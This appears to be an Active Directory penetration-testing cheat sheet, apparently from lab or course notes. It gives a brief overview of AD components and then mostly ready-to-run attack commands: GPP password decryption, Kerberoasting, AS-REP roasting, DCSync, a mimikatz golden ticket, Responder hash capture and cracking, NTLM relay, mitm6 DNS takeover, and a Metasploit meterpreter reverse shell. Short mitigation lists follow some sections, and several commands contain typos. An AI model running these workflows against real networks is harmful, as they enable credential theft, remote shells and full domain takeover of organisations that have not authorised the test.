# Basic AD Pentesting

### AD Components

#### Domain Controller

* Server with AD DS server role.
* Hosts a copy of the AD DS directory store.
* Provides authentication and authorization services.
* Replicates updates to other domain controllers.
* Allows administrative access to manage resources.

#### AD DS Data Store

* Consists of the Ntds.dit file (password hashes, sensitive information).
* Stored in the %SystemRoot%\NTDS folder on all domain controllers.

#### AD Logical Components

* **Schema:**
  * Defines objects that can be stored in the directory.
  * Enforces rules about object creation and configuration.
* **Domains:**
  * Group and manage objects in an organization.
  * May include child domains and trusts with other domains.
* **Trees:**
  * Hierarchy of domains in AD DS.
  * Can have child domains.
  * Creates two-way transitive trust with other domains.
* **Forests:**
  * Collection of Trees.
  * Shares common schema and configuration.
  * Enables trusts between domains in the forest.
  * Shares enterprise admin, schema admins groups.
* **Organizational Units (OUs):**
  * Containers that can contain users, groups, computers, and other OUs.
* **Trusts:**
  * Provide mechanisms for users to gain access.
* **Objects:**
  * Users, contacts, groups, computers, printers, shared folders, etc.

### Initial Attack Vectors

* Begin with mitm6 or Responder.
* Run a scan to generate traffic.
* Look for default credentials on web logins.
* Target websites in scope (http\_version).
* Consider printers, Jenkins, etc.
* Think outside the box.

#### Additional Resources:

* [Top Five Ways I Got Domain Admin on Your Internal Network Before Lunch (2018 Edition)](https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)

### Enumeration

#### Kerberos Enumeration

1. **Nmap Scan:**

   ```bash
   nmap -T5 10.10.10.100
   ```
2. **SMB Enumeration:**

   ```bash
   smbclient -L \\\\10.10.10.100\\
   ```
3. **Replication:**

   ```bash
   smbclient \\\\10.10.10.100\\Replication
   ```

   * In the `Replication` directory, look for `Groups.xml` file.
4. **Extracting cPassword:**
   * Copy the `cPassword` attribute from `Groups.xml`.
   * Use `gpp-decrypt` to decrypt the password:

     ```bash
     gpp-decrypt <cpassword>
     ```
5. **Psexec.py with Hash:**

   ```bash
   psexec.py active.htp /svc_tags:<cpassword>@10.10.10.100
   ```
6. **Kerberoasting with GetUserSPNs.py:**

   ```bash
   python3 GetUserSPNs.py limbawy.local/ahmed:Password -dc-ip 192.168.1.10 -request
   ```

   * Save the hash to `TGS.txt`.
   * Crack the hash using `john`:

     ```bash
     sudo john TGS.txt
     ```
7. **ASREPRoast with GetNPUsers.py:**

   ```bash
   python3 GetNPUsers.py limbawy.local/levi -dc-ip 192.168.1.10
   ```

   * Save the hash to `TGT.txt`.
   * Crack the hash using `john`:

     ```bash
     sudo john TGT.txt
     ```
8. **BloodHound for Full Control:**

   ```bash
   bloodhound-python -u Levi -p Password -ns 192.168.1.10 -d limbawy.local -c All
   ```
9. **DC Sync Attack with secretsdump.py:**

   ```bash
   python3 secretsdump.py limbawy.local/Levi:Password@192.168.1.10 -use-vss
   ```
10. **Golden Ticket with mimikatz:**

    ```bash
    mimikatz # kerberos:golden /domain:limbawy.local /sid:S-1-5-21-1314916712-2918817657-636196047 /user:Administrator:13dadc78472c366a7cd1cea42347af18 /krbtgt:b3a2e1bb5cb5e94a27f1884d86bca6c2 /ptt
    ```

#### LMNR

* LMNR (Link-Local Multicast Name Resolution) Attack Workflow:
  1. Use `responder`:

     ```bash
     responder -I tun0 -rdw
     ```
  2. Wait for events.
  3. Retrieve hashes.
  4. Crack hashes using `hashcat`:

     ```bash
     hashcat -m 5600 hashes.txt rockyou.txt
     ```
* Defense:
  * Disable LMNR and NBT-NS.
  * Enforce strong user passwords.

#### SMB

1. **Identify SMB Signing:**

   ```bash
   nmap --script=smb2-security-mode.nse -p 445 192.168.57.0/24
   ```
2. **SMB Relay Attack Workflow:**
   * Edit `responder.conf` to turn off SMB and HTTP.
   * Run `responder`:

     ```bash
     responder -I eth0 -rdw -w
     ```
   * Run `ntlmrelayx.py`:

     ```bash
     ntlmrelayx.py -tf targets.txt -smb2support
     ```
3. **Gaining a Shell using MSF:**

   ```bash
   msfconsole
   search psexec
   set rhost target_ip
   set smbdomain <domain_here>
   set smpass <password_u_cracked_here>
   set payload windows/x64/meterpreter/reverse_tcp
   set lhost eth0
   run
   ```
4. **Other Ways to Psexec:**

   ```bash
   psexec.py marvel.local/fcastle:password1:@192.168.57.141
   smbexec.py marvel.local/fcastle:password1:@192.168.57.141
   wmiexec.py marvel.local/fcastle:password1:@192.168.57.141
   ```

* **Mitigation:**
  * Enable SMB Signing.
  * Disable NTLM authentication.
  * Implement account tiering.
  * Restrict local admin access.

#### IPv6 Attacks

1. **Install mitm6:**

   ```bash
   pip3 install mitm6
   ```
2. **Setup LDAP for DNS Takeover:**
   * Go to Server Manager.
   * Add the AD Cert Services feature.
3. **DNS Takeover via mitm6 Workflow:**

   ```bash
   mitm6 -d marvel.local
   ```
4. **Delegate Impersonation Attack with ntlnrelayx.py:**

   ```bash
   ntlmrelayx.py -t ldaps://192.168.57.140 -wh fakewpad.marvel.local -l lootme
   ```

   * [The worst of both worlds: Combining NTLM Relaying and Kerberos delegation](https://dirkjanm.io/the-worst-of-both-worlds-combining-ntlm-relaying-and-kerberos-delegation/)

* **Mitigation:**
  * Disable IPv6.
  * Disable WPAD.
  * Enable LDAP signing.
  * Consider administrative users in the protected users group.

#### Passback Attack

* [How to Hack Through a Pass-back Attack](https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack)